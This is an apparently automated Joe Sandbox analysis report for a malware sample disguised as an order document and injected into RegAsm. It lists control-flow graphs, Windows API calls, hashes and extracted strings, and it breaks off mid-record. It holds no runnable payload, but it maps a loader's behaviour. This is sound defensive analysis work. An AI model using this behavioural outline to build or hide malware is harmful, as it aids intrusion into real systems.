                                                  control_flow_graph 303 f12020-f120b6 ResumeThread 306 f120b8-f120be 303->306 307 f120bf-f12101 303->307 306->307
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00F120A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 54d0fcd81712a90923e30c25fae25eaa47ff4a54b138691ab3d16f499ec5cae7
                                                  • Instruction ID: 1a63ef7bbd498ca9388b3bb72d735ec0b25e30d927cc1976ba1603b683c7b85f
                                                  • Opcode Fuzzy Hash: 54d0fcd81712a90923e30c25fae25eaa47ff4a54b138691ab3d16f499ec5cae7
                                                  • Instruction Fuzzy Hash: 8631EAB5D012189FCB14CFA9D880ADEFBB0AF49320F10802AE819B7310C775A881CF98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 312 f12028-f120b6 ResumeThread 315 f120b8-f120be 312->315 316 f120bf-f12101 312->316 315->316
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00F120A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: f95f46b4d2fd1f17f638f584f8f274fe30cceaab79cf01c83545fe625ebb5a48
                                                  • Instruction ID: ead18fd05be019aad1e8619827aa8ec8036ca8e394917307a56ee24a423e21f6
                                                  • Opcode Fuzzy Hash: f95f46b4d2fd1f17f638f584f8f274fe30cceaab79cf01c83545fe625ebb5a48
                                                  • Instruction Fuzzy Hash: FF31BBB5D012189FCB14CFA9D984ADEFBB4BF49320F14942AE819B7310C775A945CF98
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e25b75dac741ef06deaf937ebf9a397d7ccd8bf4b7844c878cba7276d396252a
                                                  • Instruction ID: 6b5a6860c7bda11b4c319faff1ee82ba12072f6f77962bf4ebcaeb2d94f07333
                                                  • Opcode Fuzzy Hash: e25b75dac741ef06deaf937ebf9a397d7ccd8bf4b7844c878cba7276d396252a
                                                  • Instruction Fuzzy Hash: 85412775E0065ACBCB68CF65C88079DF7B2BF99300F11DAEAD10DA6214EB709AD59F40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61500103a5981ec203dbfb90991842e290e5ab994dbe3afd99ab23d8e04d3a84
                                                  • Instruction ID: 3f045781fd030f09d77161a3711fadeb4770181fe8be45adb016c1ddb6e6bc55
                                                  • Opcode Fuzzy Hash: 61500103a5981ec203dbfb90991842e290e5ab994dbe3afd99ab23d8e04d3a84
                                                  • Instruction Fuzzy Hash: 6B21D872E046288BDB58CF6B9C446DEFAB7ABC9311F14C5BA940DB6214DB340A899F01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721653832.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_f10000_New Order - RCII900718_Contract Drafting.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45891b2a029e0982a6b07037d4a11c5df4be2429cba5a07e86a83ba390ad9b03
                                                  • Instruction ID: 1b2883f78b78a9ed76873d21b3b5ba5373170904db0e5dc75ebf0dfef07de0ad
                                                  • Opcode Fuzzy Hash: 45891b2a029e0982a6b07037d4a11c5df4be2429cba5a07e86a83ba390ad9b03
                                                  • Instruction Fuzzy Hash: D221AA71E056688BDB58CF6B8C546DEBAB3AFC9300F14C5BA940DB6264DB340A86DF11

                                                  Execution Graph

                                                  Execution Coverage:1.2%
                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                  Signature Coverage:5%
                                                  Total number of Nodes:141
                                                  Total number of Limit Nodes:16
                                                  execution_graph 92043 42ff63 92046 42ee63 92043->92046 92049 42d123 92046->92049 92048 42ee7c 92050 42d13d 92049->92050 92051 42d14e RtlFreeHeap 92050->92051 92051->92048 92052 42ff03 92053 42ff13 92052->92053 92054 42ff19 92052->92054 92057 42ef43 92054->92057 92056 42ff3f 92060 42d0d3 92057->92060 92059 42ef5e 92059->92056 92061 42d0f0 92060->92061 92062 42d101 RtlAllocateHeap 92061->92062 92062->92059 92063 4253a3 92064 4253bc 92063->92064 92065 425404 92064->92065 92068 425447 92064->92068 92070 42544c 92064->92070 92066 42ee63 RtlFreeHeap 92065->92066 92067 425414 92066->92067 92069 42ee63 RtlFreeHeap 92068->92069 92069->92070 92114 42c373 92115 42c390 92114->92115 92118 2892df0 LdrInitializeThunk 92115->92118 92116 42c3b8 92118->92116 92119 425013 92120 42502f 92119->92120 92121 425057 92120->92121 92122 42506b 92120->92122 92123 42cda3 NtClose 92121->92123 92129 42cda3 92122->92129 92125 425060 92123->92125 92126 425074 92132 42ef83 RtlAllocateHeap 92126->92132 92128 42507f 92130 42cdbd 92129->92130 92131 42cdce NtClose 92130->92131 92131->92126 92132->92128 92071 41ab63 92072 41ab7b 92071->92072 92074 41abd5 92071->92074 92072->92074 92075 41eae3 92072->92075 92076 41eb09 92075->92076 92083 41ec09 92076->92083 92084 42ffa3 RtlAllocateHeap RtlFreeHeap 92076->92084 92078 41eb9e 92079 41ec00 92078->92079 92078->92083 92090 42c3c3 92078->92090 92079->92083 92085 428ff3 92079->92085 92082 41ecc1 92082->92074 92083->92074 92084->92078 92086 429057 92085->92086 92087 429092 92086->92087 92094 419163 92086->92094 92087->92082 92089 429074 92089->92082 92091 42c3dd 92090->92091 92102 2892c0a 92091->92102 92092 42c409 92092->92079 92095 41913c 92094->92095 92096 41916e 92094->92096 92097 41914b 92095->92097 92099 42d173 92095->92099 92097->92089 92100 42d190 92099->92100 92101 42d1a1 ExitProcess 92100->92101 92101->92097 92103 2892c1f LdrInitializeThunk 92102->92103 92104 2892c11 92102->92104 92103->92092 92104->92092 92138 419413 92139 419443 92138->92139 92141 41946f 92139->92141 92142 41b8d3 92139->92142 92143 41b917 92142->92143 92144 41b938 92143->92144 92145 42cda3 NtClose 92143->92145 92144->92139 92145->92144 92105 414665 92106 4145f5 92105->92106 92108 41460b 92105->92108 92106->92108 92111 414670 92106->92111 92112 417da3 LdrLoadDll 92106->92112 92109 414650 92108->92109 92110 41463f PostThreadMessageW 92108->92110 92110->92109 92112->92108 92113 2892b60 LdrInitializeThunk 92146 417e3a 92147 417dd8 92146->92147 92148 417e03 LdrLoadDll 92147->92148 92149 417e1a 92147->92149 92148->92149 92150 4018de 92151 40188c 92150->92151 92154 4303d3 92151->92154 92157 42ea33 92154->92157 92158 42ea56 92157->92158 92169 407613 92158->92169 92160 42ea6c 92168 4019cc 92160->92168 92172 41b6e3 92160->92172 92162 42ea8b 92163 42eaa0 92162->92163 92164 42d173 ExitProcess 92162->92164 92183 428903 92163->92183 92164->92163 92166 42eaba 92167 42d173 ExitProcess 92166->92167 92167->92168 92187 416a53 92169->92187 92171 407620 92171->92160 92173 41b70f 92172->92173 92198 41b5d3 92173->92198 92176 41b73c 92177 42cda3 NtClose 92176->92177 92180 41b747 92176->92180 92177->92180 92178 41b770 92178->92162 92179 41b754 92179->92178 92181 42cda3 NtClose 92179->92181 92180->92162 92182 41b766 92181->92182 92182->92162 92184 428964 92183->92184 92186 428971 92184->92186 92209 418c13 92184->92209 92186->92166 92188 416a70 92187->92188 92190 416a89 92188->92190 92191 42d803 92188->92191 92190->92171 92193 42d81d 92191->92193 92192 42d84c 92192->92190 92193->92192 92194 42c3c3 LdrInitializeThunk 92193->92194 92195 42d8ac 92194->92195 92196 42ee63 RtlFreeHeap 92195->92196 92197 42d8c5 92196->92197 92197->92190 92199 41b5ed 92198->92199 92203 41b6c9 92198->92203 92204 42c463 92199->92204 92202 42cda3 NtClose 92202->92203 92203->92176 92203->92179 92205 42c47d 92204->92205 92208 28935c0 LdrInitializeThunk 92205->92208 92206 41b6bd 92206->92202 92208->92206 92211 418c3d 92209->92211 92210 41914b 92210->92186 92211->92210 92217 414253 92211->92217 92213 418d6a 92213->92210 92214 42ee63 RtlFreeHeap 92213->92214 92215 418d82 92214->92215 92215->92210 92216 42d173 ExitProcess 92215->92216 92216->92210 92221 414273 92217->92221 92219 4142dc 92219->92213 92220 4142d2 92220->92213 92221->92219 92222 41b9f3 RtlFreeHeap LdrInitializeThunk 92221->92222 92222->92220

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 131 417da3-417dbf 132 417dc7-417dcc 131->132 133 417dc2 call 42fa43 131->133 134 417dd2-417de0 call 430043 132->134 135 417dce-417dd1 132->135 133->132 138 417df0-417e01 call 42e503 134->138 139 417de2-417ded call 4302e3 134->139 144 417e03-417e17 LdrLoadDll 138->144 145 417e1a-417e1d 138->145 139->138 144->145
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E15
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 48ab1b02f76b4286e600ee140c75f391b1edbd132e6c29f50dcfdbfcfb951f3c
                                                  • Instruction ID: 14169788eed1f23adc2f3fdc1b94bc5dc64cbeeb4cf12fd44c90f30eb898ab2d
                                                  • Opcode Fuzzy Hash: 48ab1b02f76b4286e600ee140c75f391b1edbd132e6c29f50dcfdbfcfb951f3c
                                                  • Instruction Fuzzy Hash: A90152B1E0420DA7DF10DAE1DC42FEEB3B89B14308F0041A6E90897240F634EB548B55

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 42cda3-42cddc call 4048e3 call 42dff3 NtClose
                                                  APIs
                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDD7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction ID: 1b271664ba60ff3691d5156b7a89fef354a33030256d87303cd743524f2d146f
                                                  • Opcode Fuzzy Hash: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction Fuzzy Hash: 34E086762002547BD220FB6ADC41F9B776CDFC5714F004419FA0867181C774B90187F4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 178 2892b60-2892b6c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ea465b6aa0c68a2c430db0a3441981359d06aa8bc4d8f770d0d12f96098c8738
                                                  • Instruction ID: e5edc818ac97aef9dcf5325eb79bf49d6a61abd4c0de4460da6dd0082b7bb73b
                                                  • Opcode Fuzzy Hash: ea465b6aa0c68a2c430db0a3441981359d06aa8bc4d8f770d0d12f96098c8738
                                                  • Instruction Fuzzy Hash: E39002A970240007510571984424617400A87E0201B55C021E3028590DC96599A56136

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 179 2892c70-2892c7c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2e4e37d7bbce24087c67116eb386421b0164f140a4a9c0eee05c8bc02442ec4f
                                                  • Instruction ID: 9fb86341f501860ca023c16c9065ca67b20888b21413c300b054a5143b075846
                                                  • Opcode Fuzzy Hash: 2e4e37d7bbce24087c67116eb386421b0164f140a4a9c0eee05c8bc02442ec4f
                                                  • Instruction Fuzzy Hash: 5C90027970148806E1107198841474B000587D0301F59C411A6438658D8AD599A57132
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 745061ece11a69ff54bbc326d722df5bb17e25421d5f06c12b8cf4523fff31c6
                                                  • Instruction ID: 48d050a7029ab1dd9c26247e6078f69be5ca9746d296f1b5cdaff772f10ef87f
                                                  • Opcode Fuzzy Hash: 745061ece11a69ff54bbc326d722df5bb17e25421d5f06c12b8cf4523fff31c6
                                                  • Instruction Fuzzy Hash: 1F90027970140417E11171984514707000987D0241F95C412A2438558D9A969A66A132
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 80420eb80bf4e492c298da80c08af1e2c257ddbd9a9145d45a8f3d9317b7f744
                                                  • Instruction ID: a974700bf76420cad070570969028e2ae5dbd7e8cbd6fa93ce4c9b9e9f3d1d8e
                                                  • Opcode Fuzzy Hash: 80420eb80bf4e492c298da80c08af1e2c257ddbd9a9145d45a8f3d9317b7f744
                                                  • Instruction Fuzzy Hash: 68900279B0550406E10071984524707100587D0201F65C411A2438568D8BD59A6565B3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 414665-41466c 1 414614 0->1 2 41466e 0->2 3 414617-41463d call 4254e3 1->3 4 414670-414679 2->4 5 4145f5-414605 2->5 15 41465d-414663 3->15 16 41463f-41464e PostThreadMessageW 3->16 10 41467b-41467f 4->10 8 41460b-414612 call 404853 5->8 9 414606 call 417da3 5->9 8->3 9->8 13 414681-414686 10->13 14 41469d-4146a3 10->14 13->14 17 414688-41468d 13->17 14->10 18 4146a5-4146a8 14->18 16->15 19 414650-41465a 16->19 17->14 21 41468f-414696 17->21 19->15 22 4146a9-4146ac 21->22 23 414698-41469b 21->23 23->14 23->22
                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 0041464A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654
                                                  • Opcode ID: 02a98cdba99906e4db1c88ed2dc3234f2b055a68c520aa023a9c956c614dd867
                                                  • Instruction ID: 3b48d5f98b1606c160312c2f6e603751a64c8242143ad2054b4b8c2fbb1459e1
                                                  • Opcode Fuzzy Hash: 02a98cdba99906e4db1c88ed2dc3234f2b055a68c520aa023a9c956c614dd867
                                                  • Instruction Fuzzy Hash: C311C0719001483ECB206EB44C41DEF7B688EA336CF4482AFE9145B292D63D8C838B58

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(04j58b6g,00000111,00000000,00000000), ref: 0041464A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 04j58b6g$04j58b6g
                                                  • API String ID: 1836367815-1473487654
                                                  • Opcode ID: a84cd8f7fc0d69bef80fc7f052ee84cacc4c5a194b852f06e916b8cfdcd3df18
                                                  • Instruction ID: 5266371544bc21d2c7da426cc9e32103475a35b33def00ab26deaf30b38c6dd2
                                                  • Opcode Fuzzy Hash: a84cd8f7fc0d69bef80fc7f052ee84cacc4c5a194b852f06e916b8cfdcd3df18
                                                  • Instruction Fuzzy Hash: 7B01C4B2E0015C7ADB11AAE19C82DEFBB7CDF81398F408069FA14B7140D67C5E068BA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 39 42d123-42d164 call 4048e3 call 42dff3 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D15F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: jA
                                                  • API String ID: 3298025750-2063099575
                                                  • Opcode ID: 401d47821f965699dd63a83745b895c0a75c9a127d47d5ce68e2a1e8a41c987f
                                                  • Instruction ID: 3d189904869269bfaa9e7c29db680c193c98faf2f79a3c69efba9e201e0715e8
                                                  • Opcode Fuzzy Hash: 401d47821f965699dd63a83745b895c0a75c9a127d47d5ce68e2a1e8a41c987f
                                                  • Instruction Fuzzy Hash: 52E06DB6604208BBD614EF59DC41E9B77ACEFC9714F004419FA09A7281C674B91087B8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 146 417e3a-417e40 147 417e44-417e49 146->147 148 417dd8-417de0 147->148 149 417e4a-417e58 147->149 150 417df0-417e01 call 42e503 148->150 151 417de2-417ded call 4302e3 148->151 149->147 152 417e5a-417e5b 149->152 157 417e03-417e17 LdrLoadDll 150->157 158 417e1a-417e1d 150->158 151->150 157->158
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94c3acd1404e3ac41a401a3e3749ea832e792f61c3eb341312345c91ddf02113
                                                  • Instruction ID: e054f13a763780996277a1cd5d831875457fa46ead2d95c69dd061cda421e05e
                                                  • Opcode Fuzzy Hash: 94c3acd1404e3ac41a401a3e3749ea832e792f61c3eb341312345c91ddf02113
                                                  • Instruction Fuzzy Hash: A0012872E582199FCB10CA64DC12BEAB778DF11304F1093DAE814EB2D1E631AB45CF85

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 42d0d3-42d117 call 4048e3 call 42dff3 RtlAllocateHeap
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,0041EB9E,?,?,00000000,?,0041EB9E,?,?,?), ref: 0042D112
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction ID: 014aa06a742852c5f2afe70631eab3dbf45343cf107526bd9bcb42645400b060
                                                  • Opcode Fuzzy Hash: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction Fuzzy Hash: C2E092762002487BD614EF99EC81FEB77ACEFC9714F008819F909A7282C670BD1187B8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 169 42d173-42d1af call 4048e3 call 42dff3 ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,B00F02C4,?,?,B00F02C4), ref: 0042D1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: ae41a305c447b948a678a33f7f31022a44b8e5acd1a1b939f1addac3b4489a0e
                                                  • Instruction ID: e414e12be26001870bcc74c5dfcc50eb1a23960681f4a5541adfe81948ba25d6
                                                  • Opcode Fuzzy Hash: ae41a305c447b948a678a33f7f31022a44b8e5acd1a1b939f1addac3b4489a0e
                                                  • Instruction Fuzzy Hash: F8E04F366002547BD120EA5ADC02F9B779CDBC5714F004419FA1DA7141C674790187A5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 174 2892c0a-2892c0f 175 2892c1f-2892c26 LdrInitializeThunk 174->175 176 2892c11-2892c18 174->176
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5ed49f88c6f2837fad971cbf569cbdff2bd7908ff4d9cc9d30da9a51e7a62f26
                                                  • Instruction ID: 51aa057293f7f73d03ded32ea49f1d9349b26b0fa77c439e2c8ac7db300fe444
                                                  • Opcode Fuzzy Hash: 5ed49f88c6f2837fad971cbf569cbdff2bd7908ff4d9cc9d30da9a51e7a62f26
                                                  • Instruction Fuzzy Hash: B2B09B79E015C5D9FE11E7604A08717790067D0705F19C061D3074651F4778D1D5E176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2160512332
                                                  • Opcode ID: d5147ddc0220d6dfb44030fb6b58fb8658691c1586829c0d9e52a9b928e75ecd
                                                  • Instruction ID: 5f48192b18c48742ce3cae8cc57664594f5e01f5b61b60635df6c7e7bb88e383
                                                  • Opcode Fuzzy Hash: d5147ddc0220d6dfb44030fb6b58fb8658691c1586829c0d9e52a9b928e75ecd
                                                  • Instruction Fuzzy Hash: 60928B7D648345ABE721DF24C880F6BB7E9BB84718F04482DFA99D7251D770E848CB92
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 028C54AE, 028C54FA
                                                  • Critical section address., xrefs: 028C5502
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C54CE
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C540A, 028C5496, 028C5519
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 028C54E2
                                                  • Thread identifier, xrefs: 028C553A
                                                  • 8, xrefs: 028C52E3
                                                  • Critical section address, xrefs: 028C5425, 028C54BC, 028C5534
                                                  • corrupted critical section, xrefs: 028C54C2
                                                  • undeleted critical section in freed memory, xrefs: 028C542B
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 028C5543
                                                  • double initialized or corrupted critical section, xrefs: 028C5508
                                                  • Critical section debug info address, xrefs: 028C541F, 028C552E
                                                  • Invalid debug info address of this critical section, xrefs: 028C54B6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  • Opcode ID: 3034d51f215b0e9c4106a605bfed17da41af38e7e091e9420de3e362ae23316b
                                                  • Instruction ID: eefe675401b9da6e607d75a7e69f9538e3ae0a75a891a461b246aa5abdea2247
                                                  • Opcode Fuzzy Hash: 3034d51f215b0e9c4106a605bfed17da41af38e7e091e9420de3e362ae23316b
                                                  • Instruction Fuzzy Hash: 33818ABDA41358AFEF20CF98C845BAEBBB5AB08714F644119F509F7740D3B9A940CB90
                                                  Strings
                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 028C2498
                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 028C2409
                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 028C25EB
                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 028C2506
                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 028C2602
                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 028C2624
                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 028C2412
                                                  • @, xrefs: 028C259B
                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 028C22E4
                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 028C24C0
                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 028C261F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
